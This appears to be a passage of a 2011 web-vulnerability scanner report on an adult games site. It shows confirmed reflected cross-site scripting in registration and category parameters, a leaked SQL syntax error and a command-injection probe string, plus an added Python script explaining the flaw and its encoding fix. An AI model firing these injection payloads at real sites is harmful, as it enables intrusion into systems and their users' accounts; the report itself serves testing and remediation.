class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.sextronix.com/hit/144/110138/1/1/default/" target = "_blank"><img src="lopsalesforce/vert_3dbg.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Your password is different that password confirmation<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br 
/><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "3"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x00020A)</script>"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "netsparker@example.com"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central 
African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> 
<option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option 
value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option 
value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option&g..
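What the two confirmed findings above (0x00020A in password2x, and 0x00020B in emailx, which follows) show is the same defect: the probe comes back inside the form's value attribute with its quotes backslash-escaped (value = "\'\"--></style>...") but with no HTML encoding at all. A backslash means nothing to an HTML parser, so the \" still terminates the attribute, the > after -- closes the INPUT tag, and the <script> element lands in the document body, which is why the scanner could call its netsparker() function and mark the issue CONFIRMED. The correct fix is to encode for the attribute context at output time (htmlspecialchars() with ENT_QUOTES in PHP), whatever slash-escaping the input path already does. The script below is an added example, not code from the report or from the site: the slash-escaping renderer is an assumption reconstructed from the observed reflection (the report does not show user.php's source), the INPUT tag is copied from the response body, and the probe string is the one in the captured requests.

```python
"""Reproduce the reflection in the 0x00020A / 0x00020B findings and check
whether a rendered page carries the probe inside a <script> element.

Added example, not code from the report or from the site. render_vulnerable()
is an assumption: the report only shows that ' and " come back as \\' and \\"
(the behaviour of PHP addslashes() / magic_quotes_gpc) with nothing HTML-
encoded; the real user.php source is not on the page.
"""
import html
from html.parser import HTMLParser

# Probe exactly as sent in the report's requests (the parameter tables show
# the alert() form; on the wire the scanner calls netsparker()).
PAYLOAD = "'\"--></style></script><script>netsparker(0x00020A)</script>"

# The INPUT tag as it appears in the captured response, value left as a slot.
TEMPLATE = '<INPUT TYPE="text" NAME="{name}" SIZE=20 class="form" value = "{value}">'


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash before ', ", \\ and NUL. Assumed server-side step."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def render_vulnerable(name: str, value: str) -> str:
    """What the page evidently does: slash-escape, then echo into an attribute.
    A backslash is inert in HTML, so \\" still closes the attribute."""
    return TEMPLATE.format(name=name, value=addslashes(value))


def render_fixed(name: str, value: str) -> str:
    """Attribute-context encoding, the equivalent of htmlspecialchars($v, ENT_QUOTES)."""
    return TEMPLATE.format(name=name, value=html.escape(value, quote=True))


class ScriptCollector(HTMLParser):
    """Collects the text of every <script> element the parser sees."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None


def injected_scripts(body: str, marker: str) -> list:
    """Script bodies in `body` that contain `marker`. A non-empty result means
    the probe escaped its attribute and became executable markup."""
    p = ScriptCollector()
    p.feed(body)
    p.close()
    return [s for s in p.scripts if marker in s]


if __name__ == "__main__":
    for name in ("password2x", "emailx"):
        for label, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
            body = render(name, PAYLOAD)
            print(f"{name:11s} {label:10s} scripts={injected_scripts(body, 'netsparker(')}")
```

To re-test after a fix, feed the captured response body for the same POST to injected_scripts() with the marker you sent; an empty list from a parser, rather than a grep for the raw payload, is the evidence that the reflected value stayed inside the attribute. Note also that the third response on this page shows the logged-in username as the scanner's earlier command-injection probe string, so usernamex is stored and re-rendered in the header and deserves the same manual check.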
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Parameters

Parameter    Type   Value
type         GET    register
stage        POST   adduser
usernamex    POST   Ronald Smith
passwordx    POST   3
password2x   POST   3
emailx       POST   '"--></style></script><script>alert(0x00020B)</script>
country      POST   AF

Request

POST /user.php?type=register HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=07a3ec0f17402878dc4cc311f0357beb
Content-Length: 165
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx=3&password2x=3&emailx='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00020B)%3c%2fscript%3e&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4438
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span 
class = "headx">& SET /A 0xFFF9999-2 &<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Username already used<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br 
- /games_category.php

/games_category.php CONFIRMED

http://www.lessonofpassion.com/games_category.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript..

Parameters

Parameter Type Value
offset GET '"--></style></script><script>alert(0x00026D)</script>
id GET 3
category GET adventure

Request

GET /games_category.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00026D)%3C/script%3E&id=3&category=adventure HTTP/1.1
Referer: http://www.lessonofpassion.com/games_category.php?type=category&category=adventure
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=23dbc668a5388626dfb199f6b4ffe058
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 176
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x00026D)</script>,20' at line 1
- /games_category.php

/games_category.php CONFIRMED

http://www.lessonofpassion.com/games_category.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3C..

Parameters

Parameter Type Value
offset GET 20
id GET '"--></style></script><script>alert(0x000274)</script>
category GET adventure

Request

GET /games_category.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000274)%3C/script%3E&category=adventure HTTP/1.1
Referer: http://www.lessonofpassion.com/games_category.php?type=category&category=adventure
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2810
Content-Type: text/html


- /games_category.php

/games_category.php CONFIRMED

http://www.lessonofpassion.com/games_category.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
offset GET 20
id GET 3
category GET '"--></style></script><script>alert(0x00027B)</script>

Request

GET /games_category.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00027B)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/games_category.php?type=category&category=adventure
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2073
Content-Type: text/html


- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser

Parameters

Parameter Type Value
type GET register
country GET AF
stage GET adduser
stage POST adduser
usernamex POST '"--></style></script><script>alert(0x00038D)</script>
passwordx POST 3
password2x POST 3
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register&country=AF&stage=adduser HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Content-Length: 177
Accept-Encoding: gzip, deflate

stage=adduser&usernamex='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00038D)%3c%2fscript%3e&passwordx=3&password2x=3&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:02:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2157
Content-Type: text/html


- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser

Parameters

Parameter Type Value
type GET register
country GET AF
stage GET adduser
stage POST adduser
usernamex POST Ronald Smith
passwordx POST '"--></style></script><script>alert(0x00038E)</script>
password2x POST 3
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register&country=AF&stage=adduser HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Content-Length: 188
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00038E)%3c%2fscript%3e&password2x=3&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:02:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4654
Content-Type: text/html


[HTML response body trimmed to the registration form fragment that reflects the submitted passwordx value; page head, site navigation and the remainder of the country <select> list omitted]

...<div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Your password is different that password confirmation<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x00038E)</script>"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "3"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "netsparker@example.com"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> ...
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser

Parameters

Parameter Type Value
type GET register
country GET AF
stage GET adduser
stage POST adduser
usernamex POST Ronald Smith
passwordx POST 3
password2x POST '"--></style></script><script>alert(0x00038F)</script>
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register&country=AF&stage=adduser HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Content-Length: 188
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx=3&password2x='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00038F)%3c%2fscript%3e&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:02:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4656
Content-Type: text/html


[HTML response body trimmed to the registration form fragment that reflects the submitted password2x value; page head, site navigation and the remainder of the country <select> list omitted]

...<div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Your password is different that password confirmation<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "3"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x00038F)</script>"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "netsparker@example.com"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> ...
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser

Parameters

Parameter Type Value
type GET register
country GET AF
stage GET adduser
stage POST adduser
usernamex POST Ronald Smith
passwordx POST 3
password2x POST 3
emailx POST '"--></style></script><script>alert(0x000390)</script>
country POST AF

Request

POST /user.php?type=register&country=AF&stage=adduser HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Content-Length: 165
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx=3&password2x=3&emailx='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000390)%3c%2fscript%3e&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:02:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4639
Content-Type: text/html


[HTML response body trimmed to the registration form fragment that reflects the submitted emailx value; page head, site navigation and the remainder of the country <select> list omitted]

...<div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Username already used<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "3"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "3"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x000390)</script>"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> ...
<option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And 